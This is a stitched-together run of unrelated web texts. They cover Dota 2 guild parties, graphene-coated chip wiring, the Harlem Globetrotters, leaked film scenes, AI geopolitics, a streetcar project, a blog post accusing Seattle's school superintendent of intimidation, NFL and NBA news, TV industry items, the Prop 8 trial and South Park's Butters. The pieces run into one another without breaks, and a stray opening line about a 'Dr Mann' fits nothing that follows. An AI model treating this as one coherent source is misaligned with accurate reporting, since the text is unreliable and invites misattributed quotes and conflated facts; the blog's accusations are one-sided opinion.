[ SEE UPDATE ABOVE : Dr Mann calls himself a Nobel laureate in the official legal complaint against NR . ]
Guild Parties
Guild Members can form a Guild Party which is an open invitation group for match making . To form a Guild Party click on thebutton underneath your experience bar on theOnce you 've clicked the button you 'll see a list of every guild you 're currently a member of . Click onnext to the guild you want to extend your party invitation to . You 're also able to place a description which will be visible to your guild members browsing for guild games.Once you 've opened up the party to guild members , the text underneath your experience bar will now read that the Party is Open to the guild . At anytime you want to remove the open inviation you can click on Cancel . Cancelling the open inviation will not remove any guild members who joined before you cancelled it.If there is an open invitation , guild members will see a notification on the Main Menu of Dota 2 letting them know that guild members are looking for players for their game.Once they click onthey will be taken to thescreen . This screen will list any open invitation guild parties that they are a member of . They can then clicknext to the group they want to join.Additionally , if guild members have formed a private lobby , other members of the guild will be able to see it by going to Play at the top of the Main Menu and then selecting Find a Lobby . From this screen they can then choose Guild Lobbies to view any open lobbies formed by fellow guild mates .
Ever since it was discovered , scientists have dreamed of using graphene as a key semiconductor component . These efforts have generally been stymied thanks to the difficulty of growing graphene in large quantities and its lack of a band gap — with graphene , the challenge is making it stop conducting to turn a circuit off . New research at Stanford , however , suggests an interesting application for the material that does n't rely on adapting it to change some of its most fundamental characteristics . Graphene-coated copper wires have significantly better performance than standard copper wire sheathed in tantalum nitride , and the performance boost actually increases as the wires get smaller .
The perverse mechanics of wire scaling
When the semiconductor industry talks about process nodes , it 's generally assumed that moving to a new , smaller process geometry is a good thing . This continues to hold true even today — companies like Intel , TSMC , Samsung , and GlobalFoundries are required to do much more work to ensure positive results when moving to new geometries , but the net effect is still positive by certain metrics . This general trend does not hold true for copper wires .
The problem is this : Making a wire smaller means you 're reducing the amount of metal that 's available for electrons to flow through . Imagine two pipes — one with a one foot diameter , and one with a 10 foot diameter . At any flow rate ( measured in gallons per minute ) , you have to move water through the smaller pipe at a higher velocity compared to the larger . This increases both friction within the pipe and the turbulence of the water flowing through it . In a wire , pushing the same amount of current a small wire increases the resistance ( and the excess heat ) compared to a larger wire . ( Thanks to reader Sean T for sharpening my original water flow analogy ) .
Here 's where Stanford 's research comes in . The reason the copper wires are traditionally wrapped in tantalum nitride is to ensure that copper does n't migrate into the surrounding area of the chip . One of the team 's findings was that the tantalum nitride layer is roughly 8x thicker than an equivalent layer of graphene that performs the same function . That 's important in and of itself , as it allows wires to be made thinner overall without actually changing the amount of copper ( think of this as making a water pipe thinner by reducing the exterior diameter but leaving the interior diameter unchanged .
The second and arguably more important reason is that the graphene effectively acts as a secondary conduction path for the copper itself . Today , the effect is relatively modest — sheathing copper wires in graphene boosts speeds by 4-17 % depending on the length of the wire . In future chips , however , the benefits could be more significant — wires might be up to 30 % faster while still scaling to smaller sizes . Because wire delays have become one of the most significant performance limiters in modern semiconductor designs , increasing copper wire speeds could improve multiple aspects of chip design and power consumption .
I 'm more optimistic about this use of graphene as compared to its use in semiconductors . Using graphene in semiconductors requires changing some of the fundamental properties of the material or changing everything about how we build semiconductors . The one fly in the ointment will be volume production . The researchers talk about growing the graphene layers directly around the wire , but graphene has proven extremely difficult to create in volume . Until we crack that particular problem , we wo n't be building anything with graphene in significant quantities .
Sponsored by World Vision , Greyhound Lines and Baden Sports , The Harlem Globetrotters® are celebrating their 90th anniversary , continuing a world famous tradition of ball handling wizardry , basketball artistry , and one-of-a-kind family entertainment that continues to thrill fans of all ages .
Harlem Globetrotters International , Inc. is a wholly-owned subsidiary of Herschend Family Entertainment Corporation , the largest family-owned themed entertainment company in the U.S . Throughout their history , the Original Harlem Globetrotters have showcased their iconic talents in 122 countries and territories on six continents , often breaking down cultural and societal barriers while providing fans with their first-ever basketball experience . Proud inductees of the Naismith Memorial Basketball Hall of Fame , the Globetrotters have entertained hundreds of millions of fans-among them popes , kings , queens , and presidents-over more than eight thrilling decades . For the latest news and information about the Harlem Globetrotters , and to purchase tickets and team merchandise , visit the Globetrotters ' official Web site : www.harlemglobetrotters.com .
Harlem Globetrotters
400 E. Van Buren St. , Suite 300
Phoenix , AZ 85004
Phone : 800-641-HOOP ( 4667 )
Fax : 602-258-5925
Email : [ email protected ]
VIDEO : Drone flying through fireworks makes for mesmerizing sight
TIPS : Firework safety
A video that has gone viral shows a drone flying through a series of fireworks explosions .
Click through to learn firework safety tips . TIPS : Firework safety
A video that has gone viral shows a drone flying through a series of fireworks explosions .
Click through to learn firework safety tips . Image 1 of / 18 Caption Close VIDEO : Drone flying through fireworks makes for mesmerizing sight 1 / 18 Back to Gallery
It 's not often firework admirers get an aerial view of the explosions .
Luckily , a man with nothing to lose except an expensive drone and a GoPro camera made a video giving viewers an intimate look inside a storm of fireworks .
FIREWORKS TRAGEDY : The 'magical ' Mexican town where pyrotechnics are life - and too often death
Youtuber AlteredStates posted the video in 2014 , but with New Years right around the corner , the video has once again gone viral .
Click through above for some safety tips to know before celebrating with fireworks .
Parched
Two intimate scenes from `` Parched '' were leaked and went viral online .
Actor Adil Hussain said that the recent leak of certain lovemaking scenes with co-star Radhika Apte from the movie “ Parched ” , reeks of the patriarchal mindset of our society .
Speaking to Indian Express.com , Adil said , `` The most interesting aspect is that the leaked videos is titled as Radhika Apte sex scene and not as Adil Hussain sex scene . That 's because a man doing it is just another matter , whereas when a woman does it , it does matter . It is only then when it becomes a sex scene . It also shows the patriarchal society that we live in . In the West , such scenes are normally shown in their films . ''
He also told the site that he felt `` very weird '' about the entire incident which only goes to show the `` sexually obsessed '' nature of some people in our society .
Two intimate scenes from `` Parched '' - one featuring Adil and Radhika and the other featuring Radhika and Tannishtha Chatterjee- were leaked and went viral online .
The internationally acclaimed movie has been produced by Ajay Devgn and Aseem Bajaj , and directed by Leena Yadav . The movie revolves around the lives of four ordinary women Rani , Lajjo , Bijli and Janaki in rural Gujarat and had its world premiere at the Toronto International Film Festival .
The cyber cell has been approached by the makers of the film .
Last year , in a similar incident , a reportedly nude scene of a 20-minute short film , directed by Anurag Kashyap and starring Radhika Apte , was leaked online and was doing the rounds on WhatsApp .
After Anurag approached the police , the cyber cell of the Mumbai police registered cases against unknown persons for leaking the scene .
Long , long ago in a Hollywood producers ' office in Beverly Hills , a young animator blurted out , “ Picasso wants to make a movie ! Picasso ! I 've met with him . He 's agreed to work on a feature film and he 'll animate some of his art works ! ”
The producers , leaping to their feet shouted : `` Great idea ! Let 's make it ! ” That started the wheels rolling . The producers locked on to a short story that Ray Bradbury had written , and hired him to write the screenplay .
“ The Picasso Summer ''
Everyone wanted to meet Picasso . Soon , Albert Finney , five time Academy Award actor nominee , beautiful and intelligent Yvette Mimieux , and French director Serge Bourguignon were on board . Of course , it had to be filmed in the south of France near Picasso 's villa .
But -- -surprise ! Things do n't always go as planned . The director decided that Bradbury 's script was “ trés banal ! ” He would n't emerge from his trailer without first having freshly squeezed orange juice and then insisted on directing from horseback .
It appears that Europe is not prepared to contend for global AI leadership and may be fatefully late to the table , according to a French expert on Transhumanism .
Laurent Alexandre , French entrepreneur and Transhumanist visionary , told Sputnik France that Europe appears to be unable to comprehend the nature of artificial intelligence and its role in mankind 's future .
`` There are four geopolitical entities : the United States with its Silicon Valley which has understood everything , China which is quickly catching up , and Russia which has understood the geopolitical equation even while lacking the computer power of Silicon Valley or China . This summer Putin said that he who attains leadership in artificial intelligence will rule the world… And then there 's Europe which failed to understand anything , and lacks both the technological power of the US or China and Putin 's geopolitical vision . In terms of technology , Europe still has n't realized that artificial intelligence is war . Europe thinks that it will be at peace for the next thousand years . We return to confrontation between biological brains and geopolitical entities , '' Laurent said .
© REUTERS / Hyungwon Kang Google Chairman : China Will ‘ Dominate ' US in AI By 2030
He pointed out that artificial intelligence is poised to surpass human intelligence in some areas , as even the “ non-self-aware AI can diagnose cancer more efficiently than the finest oncologist in the world . ”
`` The clever and quick-thinking will get more money and job opportunities while others may find themselves in a tight spot . Due to the fact that we did not improve our schools by taking into account the plight of those who are less capable of becoming successful , we face the risk the emergence of the ‘ Gods ' and the ‘ worthless people ' : the emergence of a numerically small intellectual aristocracy that would rule the world where a horde of castaways has to contend with a universal basic income , '' he remarked .
READ MORE : 'Summoning the Demon , ' 'Tower of Babel ' : Debate Over AI God Heating Up
Laurent also said that Transhumanists will eventually become the majority and , because they will turn to brain augmentation technologies sooner than the `` bio-conservatives '' , the former will seize first demographical and then political power in the world .
He added that conservatives like Alain Finkielkraut who said that the Internet is mankind 's worst creation do not contribute to progress .
`` The kind of conservatism espoused by Finkielkraut is useless and will be wiped out by technological progress… We can not let the intellectual elite to ignore the plight of millions of the less-gifted people . We need to decrease the intellectual inequality ; intellect needs to be redistributed in order to prevent inequality , '' Laurent explained .
Transportation , city and community leaders gathered at the Santa Ana Regional Transportation Center on May 11 afternoon to mark a number of milestones toward the construction of Orange County 's first modern streetcar .
The OC Streetcar project , planned to travel through the cities of Santa Ana and Garden Grove , has advanced significantly in recent weeks . Plans for the streetcar project have been approved by city councils in both cities and received environmental clearances from the Federal Transit Administration .
The OC Streetcar , expected to be partly funded by Measure M – the county 's half-cent sales tax for transportation improvements – was recently accepted into the project development phase of the New Starts federal grant program , making it a candidate for future funding .
The Orange County Transportation Authority ( OCTA ) has taken over as the lead agency to design , build and operate the OC Streetcar .
“ For years , we 've been talking about the concept of a streetcar in Orange County , and now we want people to know that the future of the OC Streetcar is on track , ” said OCTA Chairman Jeff Lalloway , also mayor pro tem of Irvine . “ We 're excited as we look to fulfill another promise made to the voters who approved Measure M by providing better connections between transit centers and the places where people live , work and shop . ”
The streetcar is intended to provide easy connections for people traveling from trains and buses to employment , retail and recreational areas in the heart of Orange County .
The OC Streetcar is planned to operate along a route just more than 4 miles , from the Santa Ana train station , through Downtown Santa Ana and the Civic Center . It would run along 4th Street and Santa Ana Boulevard . The route would continue along the Pacific Electric right of way and connect to a new multimodal transit hub at Harbor Boulevard and Westminster Avenue in Garden Grove .
“ We are thrilled to see the OC Streetcar moving forward to improve transportation not just in Santa Ana and Garden Grove but throughout Orange County , ” said Santa Ana Mayor and OCTA Director Miguel Pulido . “ The streetcar will provide a convenient and affordable way for people to travel and we expect it to serve as an economic boost to the vibrant neighborhoods along the route . ”
Up to seven streetcars are planned to run along the route , stopping at 12 stations . It 's expected that by 2035 , the streetcar would carry more than 6,000 riders a day . Initial estimates put the cost of the project at $ 250 million and it will be jointly funded with OCTA pursuing local , state and federal dollars .
It 's expected the project will move into the design phase later this year with construction planned to begin in 2017 . On the current schedule , the streetcar would begin operating in 2019 .
“ Fear of reprisal. ” This is one of the reasons cited in the recently released state audit for why people within the Seattle School District central office did n't speak up about the obviously shady Regional Small Business Development Program .
To those of us within or closely watching the district , we know exactly what the report is referring to .
The Seattle School District is currently infected by a pervasive , poisonous attitude in which dissent or whistle-blowing is met with retaliation , not attention or correction .
This culture of fear and reprisal to some extent predates the arrival of Goodloe-Johnson in July 2007 , but has gotten worse – some say toxic – under her leadership .
“ It 's my way or the highway , ” is a frequent summary of Goodloe-Johnson 's management style by those in the community who have observed or dealt with her .
This appears to be a common attitude among school superintendents across the nation who have been trained by the Broad Foundation . Superintendent Goodloe-Johnson was trained at the Broad Foundation 's “ Superintendent 's Academy. ” This program , created by real estate billionaire Eli Broad who believes in privatizing public education , trains superintendents to run school districts like businesses , with a top-down central authoritarian management style . Under Goodloe-Johnson , authority and autonomy have been drained from schools and centralized in the John Stanford Center . Under Goodloe-Johnson , dissent is not tolerated , and community input is not truly sought or heeded . This has created an oppressive culture emanating from the John Stanford Center whose administrators apparently feel they must answer to no one . This has helped to make this district prone to fraudulent activities like that of Silas Potter 's scheme .
When the school district dismisses Goodloe-Johnson , this attitude and culture must go too .
During the school closures battle , also known as the superintendent 's “ Capacity Management Plan , ” from Thanksgiving of 2008 to the end of January 2009 , I spoke with a retired principal who was very concerned about an aspect of the proposal and opposed it , having experienced firsthand the problems associated with the plan . Though this principal had authority on the subject , s/he was afraid to publicly speak up about it because s/he was told by another principal s/he 'd better keep quiet “ If s/he ever wanted to work in this district again . ”
I know of a teacher who was also a vocal critic of the superintendent 's school closures plan and got a surprise visit from the superintendent while teaching one day , and then was among the 100-plus teachers who were RIFed by the superintendent ( on “ Teacher Appreciation Week ” ) later that year . This teacher remained unemployed for a year .
Another teacher speaks to me only furtively in the school where s/he works for fear of being seen dissenting . Other teachers say the atmosphere in their schools is heavy with fear , in part because of the local and national obsession with teacher evaluation that has zero trust in teachers ' ability or worth , especially that of older , more experienced teachers , beyond their ability to raise their students ' standardized test scores in two subjects . ( See my earlier post on this : Plummeting teacher morale in Seattle 's Public Schools — a serious issue )
I know of a parent whose child 's school was threatened with closure , eviction and division under the 2008/09 “ Capacity Management Plan , ” and who expressed disagreement with the plan in an e-mail to the superintendent from work . The superintendent apparently then contacted this parent 's employer at his/her place of work and complained to the boss .
Those of us who know about this incident were floored by such tactics of intimidation used by the superintendent against a parent . For many of us , this set the tone for the superintendent 's tenure here .
Many parents who post information , concerns , opinions on the local education blogs use pseudonyms for fear of reprisal .
Some teachers also post comments mostly under pseudonyms for this same reason .
A school board member once told me that there are “ people who want to do harm to the district ” when I spoke to him about parental concerns about the children of Cooper Elementary who were evicted from their building and disbursed so that another school of kids could have their nice building . His concern was not for the kids of Cooper , but for the perceived “ damage ” being done to the district 's reputation by those who spoke up about how their children were treated .
This board member also told me that at a national meeting he had attended , school board members from around the country seemed only interested in talking to him about the Supreme Court case decision that Seattle had lost . He seemed disturbed and embarrassed by this reputation .
It is pretty clear that the school district has an obsession with avoiding “ negative publicity. ” But the funny thing is , if the central administration and district leadership would simply conduct themselves honestly , make decisions rationally and openly , truly engage with the community , they would n't have to live in fear of “ negative publicity . ”
An irony of the latest scandal is that one of the most damning elements of it is Goodloe-Johnson 's apparent effort to hide the facts from the board and public rather than deal with them head on .
All we parents have ever asked of this district is to communicate with us honestly about the budget , about our children 's schools . Instead we are told our kids ' schools are being closed to save money , when that is n't the case . We are told the excessive and costly MAP® test will help our teachers measure our kids , when in fact it is being used to measure and terrorize our teachers . We are told there is no money for smaller class sizes , safe buildings or school counselors , and yet apparently there is money for a bloated central office , $ 7,000 parties with carving stations and a strange enterprise operating out of the John Stanford Center itself that has nothing do with educating our kids , but offers classes in contract bidding to small businesses , including dog-care workers and makes $ 1.8 million disappear .
Clearly the priorities at the John Stanford Center are out of whack . This needs to change .
Those of us who have observed and critiqued this district these past few years have done so with no glee whatsoever . I for one would welcome the opportunity to cheer this district on for doing its job well . For building upon and replicating the many schools and programs it has that are doing well – rather than evicting or splitting them . For supporting and respecting teachers rather than demoralizing them . For making sure as many dollars as possible that come into the district make it into our children 's classrooms , instead of being diverted to schemes , outside contractors , standardized test vendors and unnecessary bureaucracy .
I see this moment as an opportunity for Seattle Public Schools . An opportunity for new leadership and a new culture and philosophy of honesty , openness . Once that happens , the school district will not have to fear “ negative publicity . ”
Let the new era begin .
–Sue p .
CLOSE Our guys give their predictions for Sunday 's showdown between the Baltimore Ravens and the Green Bay Packers at Lambeau Field . ( Nov. 17 , 2017 ) USA TODAY NETWORK-Wisconsin
Green Bay Packers offensive tackle Bryan Bulaga ( 75 ) gestures to the bench after going down hurt on a play against the Detroit Lions in the third quarter at Lambeau Field on Monday , November 6 , 2017 in Green Bay , Wis. ( Photo : Adam Wesley/USA TODAY NETWORK-Wi )
GREEN BAY – Right tackle Bryan Bulaga has a long road ahead after suffering another torn ACL , but Green Bay Packers offensive line coach James Campen said he expects the veteran to bounce back .
Bulaga returned from a torn ACL in his left knee that cost him all of 2013 to become one of the top right tackles in the NFL , earning a five-year , $ 33.75 million contract after the 2014 season . He was relatively healthy the past three seasons , missing only five games . He played in all 16 games last season for the first time since his rookie year .
Then Bulaga tore the ACL in his right knee this month against the Detroit Lions .
“ You feel really bad for the player , ” Campen said , “ because he 's on the rise , had a really good year last year , everything is pointing upwards for the guy , and that happens . It 's easy for all of us to say , and we 're all guilty of saying , ‘ Well , that 's just football . ' And it is . I get that . It 's football and life , and things happen . But when it happens to one of your own , it hurts . ”
The Packers will have a difficult decision to make regarding Bulaga 's future . With ACL surgeries in both knees , it 's uncertain what kind of player Bulaga will be in the future . There are still two years left on his contract , but the team can opt out of it this spring , leaving them with only $ 3.2 million in dead money .
Campen noted that even though Bulaga is one of the team 's longest-tenured players , he 's only 28 . Bulaga is still the youngest player in NFL history to start a Super Bowl ( 21 years , 322 days ) . He wo n't turn 29 until March , an age at which he should have plenty of good football years left , if healthy .
Bulaga already has recovered from one torn ACL . His offensive line coach believes he can do it again .
“ From the mindset of that kid ? Absolutely , ” Campen said . “ Heck yeah . He loves playing ball , he 's young as heck . Look at him . He 's built good .
“ I expect him to bounce back from that . ”
RELATED : Packers ' secondary ca n't match Ravens ' investment in experience
SILVERSTEIN : Justin McCray is a perfect fit for way Packers must play
RELATED : Packers will face Ravens without injured Ty Montgomery
Flacco factor : Joe Flacco has what Packers defensive coordinator Dom Capers calls a “ big arm , ” but it has n't helped the Baltimore Ravens quarterback post big numbers this season .
Flacco ranks 27th in the NFL with 1,551 passing yards , and 31st with a 72.7 rating . He has eight touchdowns against 10 interceptions and is dead last among 33 qualified passers with 5.33 yards per pass .
For context , that 's lower than Packers quarterback Brett Hundley 's 5.7-yard average .
But there is one area where Flacco has been adequate . He has been sacked 19 times this season , and though that 's tied for 15th in the NFL with Aaron Rodgers — who has missed the past three games and was behind a backup offensive line when he did play — that still puts Flacco well behind the league 's most-sacked quarterbacks .
“ He wo n't hesitate to get the ball out of his hand right now , ” Capers said . “ There are certain schemes that they have where , I do n't care how much pressure you come with — five- or six-man pressure — the ball 's out . He 's experienced enough to recognize those things . They will max up when they want to throw the ball deep , and give him plenty of protection . ”
It presents a significant challenge to the Packers ' pass rush , which awoke last Sunday in Chicago after weeks of slumber . The Packers rank 25th in the league with 18 sacks , even after taking down Bears quarterback Mitch Trubisky five times . Most troubling , the Packers were unable to get to Detroit Lions quarterback Matthew Stafford two weeks ago , even though the 30 times Stafford has been sacked this season are third-most in the NFL .
But Capers is confident his unit still can get to Flacco .
“ There 's been times that people have gotten him off the spot , ” Capers said , “ because he 's more of a pocket guy . Sitting in there , that 's when he 's at his best , when he can sit in there and use his arm strength . ”
CLOSE Aaron Nagler speaks with Jeff Zrebiec of the Baltimore Sun about the Packers ' upcoming opponent , the Baltimore Ravens . ( Nov. 16 , 2017 ) USA TODAY NETWORK-Wisconsin
​​​​​​​Injury update : Rookie cornerback Kevin King was among four Packers players listed as questionable for Sunday 's game against the Ravens .
King ( shoulder ) was joined in that designation by outside linebacker Ahmad Brooks ( back ) , defensive tackle Quinton Dial ( chest ) and reserve guard Lucas Patrick ( back ) . Brooks played through his back injury last week in Chicago , and Dial said this week he expects to play Sunday .
Four players were ruled out against the Ravens : running backs Aaron Jones ( torn MCL ) and Ty Montgomery ( ribs ) , safety Morgan Burnett ( groin ) and right tackle Bryan Bulaga . Jones will be out three to six weeks with his injury , while Bulaga will miss the rest of the season .
After the reboot Terminator : Genisys drastically underperformed this summer , it seems the franchise is once again on the backburner . David Ellison and Skydance Productions at one time had two sequels and a TV program in development for the series , THR reports , but now that universe is `` on hold indefinitely . ''
Ellison successfully helped fund World War Z , Mission Impossible : Rogue Nation , and True Grit , but tried to take a more creative role in Terminator . While his vision of a full universe of products was supported by Paramount , THR says he `` was n't listening to anybody '' when it came to actually developing it , which ultimately led to the failure of the reboot .
Skydance , meanwhile , is continuing to work with Paramount , developing a Jack Ryan TV series with them and Amazon and working with Jerry Bruckheimer on a long-gestating Top Gun sequel that will star Tom Cruise .
Starz recently announced that the upcoming third season of Da Vinci 's Demons will be the period drama 's last . The series , which has been off the air for almost year and a half , has been a respectable performer , so the decision to end it before seeing how Season 3 does was somewhat of a surprise .
It came down to having stronger shows that appeal to the same demographics , CEO Chris Albrecht said . “ We really believe in serving underserved audiences in the premium cable space , ” he said , noting the network 's success with female-oriented The White Queen and Outlander and black-skewing comedy Survivor 's Remorse . “ The key is having shows that target a specific audience that becomes really passionate about the show . ”
Albrecht said he loved Da Vinci 's cast and loved working with series creator David S. Goyer but noted Goyer 's busy feature schedule , which led to a showrunner transition on the show after the first two seasons .
Meanwhile , “ We have the success with Black Sails , which in some ways appeals to some of the same audiences , and while we have a lot of fan boys for Da Vinci 's Demons , we have what may be the fan boy series of all time in Ash vs. the Evil Dead. “
The decision to end Da Vinci 's Demons was made after Season 3 was shot , so the producers did n't necessarily plan the season finale as a series finale . Still , Albrecht promises “ a very satisfying conclusion ” and a satisfying way for fans to get to it by getting access to the entire final season on-demand the day of the premiere .
He says that “ if we did n't stop now , the story should 've gone through the next point , and we would 've been in it for at least a couple of more seasons . ”
Starz brass ultimately decided that now was a good time to end the show . “ There is no bad news here , ” Albrecht said , disagreeing with the c-word ( as in cancellation ) used for a show like Da Vinci 's Demons . “ The show ran its course . If a show runs for 3 seasons , it does n't mean it 's not a success , especially in the premium space . ”
The first major experiment with broadcasting a federal trial has found its case , and it is bound to create controversy ( and some great television ) . A federal judge in San Francisco said today that the trial over the constitutionality of California 's Proposition 8 , that banned same-sex marriages in the state , will be televised starting on Jan. 11 . The American Foundation for Equal Rights , which is helping fund the case against Prop 8 , announced in a tweet that the judge approved televising the case and having video available on Youtube , pending the okay of an appeals court which approved the experiment . The trial will not be available “ live , ” something requested by media outlets . Instead , the trial will be recorded by the court and then made available later , according to a spokesperson for the court .
While states have allowed the televising of trials for some time—Court TV created an entire network around the idea—federal courts have not previously allowed the televising of non-criminal trials . But the Ninth Circuit appeals court approved experimenting with broadcasting trials in December and the chief judge who oversees the federal trial courts in northern California thinks the Prop 8 trial is the perfect place to start the TV cameras rolling .
Judge Vaughn R. Walker had been signaling that the Prop 8 trial was ripe for the glare of the television lights since the Ninth Circuit approved the experiment . He 's set-up a website about the trial , issued guidance to the media , allowed computers and texting , and now said the cameras can carry coverage .
Supporters of Prop 8 have opposed televising the trial from the beginning . Their chief concern—as laid out by Edward Whelan at the National Review , who calls it a “ show trial ” —is that it violates the spirit of rules set out by the Supreme Court and the federal judiciary . But more important , critics argue , witnesses and counsel will face harassment and intimidation by same-sex marriage activists .
These are kangaroo-court procedures . As counsel for the Proposition 8 sponsors spell out in their letters opposing televised proceedings , the fair-trial concerns that animate the Judicial Conference 's opposition to televised proceedings apply with special force in this case . Given all the harassmentof Proposition 8 supporters that has already occurred , “ it is not surprising , ” as counsel 's December 28 letter puts it , that “ potential witnesses have already expressed to [ counsel ] their great distress at the prospect of having their testimony televised ” and that “ some potential witnesses have indicated that they will not be willing to testify at all if the trial is broadcast or webcast beyond the courthouse. ” The likelihood of intensified harassment of counsel is also obvious .
Same-sex marriage supporters want the telegenic odd-couple of David Boies and Ted Olsen , who represent Prop 8 opponents , all over the news for the next month because they believe broadcasting the trial will bring sympathy to their cause . When the judge announced he was taking comments on the proposal to allow cameras , groups like the Courage Campaign began a petition and letter-writing effort to encourage allowing cameras in the courtroom .
Have a tip we should know ? tips @ mediaite.com
MIAMI — John Collins is in the middle of a very busy time .
The former Cardinal Newman basketball standout has traveled around the country to work out for the Kings , Lakers , Nuggets , Trail Blazers , Pistons , Bulls and Hornets during this busy evaluation process leading up to the June 22 NBA draft . But Wednesday 's workout for the Heat at AmericanAirlines Arena felt a little different .
“ It felt kind of weird , man , ” said Collins , who spent his teenage years living in West Palm Beach . “ Most of the time I come to Miami , I 'm either just hanging out or I was playing high school basketball . But to actually go into the arena and actually play basketball . I 've been to that arena so many damn times . To actually put some Heat gear on and play in front of those guys — it was crazy , man . It was definitely one of the moments I 'll never forget . I 'm a big Heat fan . That was huge . ”
[ Alonzo Mourning on Pat Riley 's attempt to turn Miami Heat into a contender : ‘ This is going to be special ' ]
[ A look at each player on Heat 's 15-man roster : Who will be back next season ? ]
Collins was a big supporter of the Heat growing up , attending games at AmericanAirlines Arena and celebrating each of the two titles and four Finals appearances during the Big Three era . The Wake Forest power forward even grew up with “ a couple of D-Wade posters on the wall . ”
But Wednesday was an opportunity for the Heat to watch Collins , who said president Pat Riley , general manager Andy Elisburg , head coach Erik Spoelstra and “ everybody in the front office ” were in attendance for the workout . It was a group session that also included guard Terrance Ferguson , Purdue power forward/center Caleb Swanigan and Duke shooting guard Luke Kennard .
“ It was one of the more cardio intensive workouts , but I was prepared for it , ” Collins said of his group workout with the Heat . “ I knew that coming in . I know that Pat 's big thing is being in word class shape . He 's big on that . But it was n't too crazy . But you could definitely tell they wanted to get us moving , show off our athleticism and let us play . It was a good workout . But it was definitely one of the more cardio intensive workouts . ”
Collins ( 6-10 , 225 ) is an intriguing prospect , as he averaged 19.2 points and 9.8 rebounds and was named the ACC 's Most Improved Player as a sophomore at Wake Forest last season . The 19-year-old led the nation with a player efficiency rating ( PER ) of 35.9 .
Collins is projected to be drafted in Miami 's range around the 14th overall pick in most mock drafts . In fact , DraftExpress ' latest mock has Collins going to the Heat in the first round , while others like NBADraft.net has Collins going to the Pacers at No . 18 .
“ Miami is n't my hometown because I am from Palm Beach , but you get the sense that everybody in Palm Beach is a Heat fan , including myself . It would definitely be wild , ” Collins said of the possibility of getting drafted by the Heat . “ I 've been to AmericanAirlines Arena too many times to count . I grew up watching D-Wade and Shaq and then you get to see the Big Three era . Obviously , D-Wade is an icon down there regardless of what team he 's on . It would be crazy . It honestly would be insane to see myself in a Heat uniform . It would be crazy , man . ”
As far as meeting Riley , the experience lived up to Collins ' expectations .
“ His hair is always on point , ” Collins said . “ He 's always going to have that showtime swag . You know how he does , man . That 's in his DNA . He 's always going to have that swagger , that aura with him . I would n't expect anything less . ”
[ Want more Heat news sent directly to your Facebook feed ? Make sure to like our Heat Facebook page ]
Leopold `` Butters '' Stotch is a fictional character in the animated television series South Park . He is voiced by series co-creator Matt Stone and loosely based on co-producer Eric Stough . He is a student at South Park Elementary School . Butters is depicted as more naive , optimistic , and gullible than the show 's other child characters and can become increasingly anxious , especially when faced with the likelihood of being punished , which is usually just being grounded , of which he is extremely terrified . As a result , he is often sheltered and unknowledgeable of some of the suggestive content his peers understand , and is also frequently the victim of abuse and manipulation by Eric Cartman . His name is a play on the confection butterscotch .
Butters debuted as an unnamed background character when South Park first premiered on Comedy Central on August 13 , 1997 ; his role gradually increased , becoming one of the series ' most frequently present characters beginning with season 3 . Creators Parker and Stone have stated that he is one of their favorite characters .
Role in South Park
Butters attend South Park Elementary as part of Mr. Garrison 's ( later Mrs. Garrison 's ) 4th grade class ( which was taken over by Ms. Nelson after Garrison became the 45th President of the United States in season 19 ) . Storyboards and scripts for seasons 1 and 2 had his original names as `` Puff Puff '' and `` Swanson '' respectively . In `` AWESOM-O '' , he says his birthday is on September 11 , referencing the terrorist attacks of the World Trade Center on September 11 , 2001 , another sign of his misfortunes . He learns from his parents in `` Going Native '' that he was born on the island of Kaua ' i . During the show 's first 58 episodes ( 1997 through Season 4 episode `` 4th Grade '' in 2000 ) , Butters and the other main child characters were in the third grade . He lives in South Park as the only child of Stephen and Linda Stotch , from whom he perpetually faces the looming prospect of being grounded and abused . When the character of Kenny McCormick was temporarily written off the show near the end of Season 5 , Stan Marsh , Kyle Broflovski , and Eric Cartman allow Butters into their group as the `` fourth friend '' , [ 1 ] a role he continued to fill until midway through season 6 , namely , the episode `` Professor Chaos '' . During this period , the boys would often take advantage of Butters ' mild temperament by making him a stooge in their own personal schemes . The three eventually ousted him in favor of Tweek Tweak .
Butters as his evil alter ego `` Professor Chaos ''
As a result , Butters vengefully adopted the alter ego of Professor Chaos . Intending to be a supervillain , Professor Chaos wears a green cape , and a helmet and gauntlets constructed out of cardboard and aluminum foil , a parody of Marvel Comics ' Dr. Doom . Butters as Professor Chaos received much focus during the back-to-back episodes `` Professor Chaos '' and `` Simpsons Already Did It '' , where he took on his younger friend Dougie as his sidekick General Disarray and ultimately failed at their several ill-prepared attempts to create `` worldwide chaos '' . Professor Chaos has occasionally made a few appearances since , appearing to be a known supervillain to South Park 's police force .
Despite being displaced from both his role as the `` fourth friend '' and from the eventual return of Kenny , Butters has continued to be a major character in recent seasons and is still a good friend to the group . Formerly a social outcast in earlier episodes , he has nevertheless been seen spending considerable amount of time with the other children , and continues to be a frequent source of help to Cartman , while also being the main victim of Cartman 's pranks and manipulation : for instance , in the season 11 episode `` Cartman Sucks '' , Cartman goes on numerous sleepovers with Butters so he can pull pranks on him in his sleep . [ 2 ] Though the act is customarily performed by Stan or Kyle , Butters will occasionally reflect on the lessons he has attained during the course of an episode with a brief speech , and will sometimes muster up enough courage to act as the voice of reason when his parents or other adults in town engage in irrational behavior . [ 3 ] [ 4 ] [ 5 ] [ 6 ]
Character
Creation and design
On August 13 , 1997 , Butters first appeared as a background character when South Park debuted on Comedy Central with the episode `` Cartman Gets an Anal Probe '' . [ 7 ] For the episode , the character was composed of construction paper cutouts and animated through the use of stop motion . [ 8 ] Since then , like all other characters on the show , Butters has been animated with computer software , though he is portrayed to give the impression that the show still utilizes its original technique . [ 8 ] In the tradition of the show 's animation style , Butters is composed of simple geometrical shapes and colors . [ 8 ] [ 9 ] He is not offered the same free range of motion associated with hand-drawn characters ; his character is mostly shown from only one angle , and his movements are animated in an intentionally jerky fashion . [ 2 ] [ 8 ] [ 9 ] Butters has a large tuft of blond hair on top of his head , and is usually depicted wearing an aquamarine jacket with dark green pants and black shoes . When voicing Butters , Stone speaks within his normal vocal range while adding a childlike inflection , a slight stutter , and a Southern accent . The recorded audio is then edited with Pro Tools , and the pitch is altered to make the voice sound more like that of a fourth grader . [ 10 ] [ 11 ]
Development
